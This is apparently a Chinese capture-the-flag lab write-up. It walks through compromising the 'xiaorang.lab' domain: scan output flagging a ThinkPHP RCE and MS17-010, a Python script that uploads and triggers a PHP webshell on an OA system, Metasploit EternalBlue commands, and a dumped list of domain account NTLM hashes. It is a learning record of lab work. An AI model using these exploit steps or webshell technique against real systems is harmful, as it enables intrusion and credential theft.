39.99.141.147:80 open 39.99.141.147:22 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://39.99.141.147 code:200 len:5578 title:Bootstrap Material Admin [+] PocScan http://39.99.141.147 poc-yaml-thinkphp5023-method-rce poc1
172.22.1.2:88 open 172.22.1.21:139 open 172.22.1.2:139 open 172.22.1.21:135 open 172.22.1.18:139 open 172.22.1.18:80 open 172.22.1.15:80 open 172.22.1.2:135 open 172.22.1.18:135 open 172.22.1.15:22 open 172.22.1.18:3306 open 172.22.1.21:445 open 172.22.1.2:445 open 172.22.1.18:445 open [*] NetInfo: [*]172.22.1.2 [->]DC01 [->]172.22.1.2 [*] NetInfo: [*]172.22.1.18 [->]XIAORANG-OA01 [->]172.22.1.18 [*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin [*] NetInfo: [*]172.22.1.21 [->]XIAORANG-WIN7 [->]172.22.1.21 [+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] 172.22.1.2 (Windows Server 2016 Datacenter 14393) [*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600 [*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login [*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统 [+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
r = session.post(url1, data=data1) r = session.post(url2, files={'file': open('1.php', 'r+')}) filepath = str(r.json()['filepath']) filepath = "/" + filepath.split('.uptemp')[0] + '.php' print(filepath) id = r.json()['id'] url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}' r = session.get(url3) r = session.get(url_pre + filepath + "?1=system('dir');") print(r.text)
记得自己写个1.php的马子,蚁剑连接
1
C:\Users\Administrator\flag> type flag02.txt
flag03
172.22.1.21是个ms17-010,上msf打就完事了
1
proxychains4 msfconsole 2>/dev/null
1 2 3 4 5 6
search ms17-010 use exploit/windows/smb/ms17_010_eternalblue show payloads set payload payload/windows/x64/meterpreter/bind_tcp set rhosts 172.22.1.21 run
[DC] 'xiaorang.lab' will be the domain [DC] 'DC01.xiaorang.lab' will be the DC server [DC] Exporting domain 'xiaorang.lab' [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) 502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514 1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512 1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512 1000 DC01$ 075b7ba049ee9b65eb3aea0fb13440e3 532480 500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512 1104 XIAORANG-OA01$ eca40798d7ca35d5b2f0ecb7217a68a5 4096 1108 XIAORANG-WIN7$ c7631dbcd38dac582e8c891880c40517 4096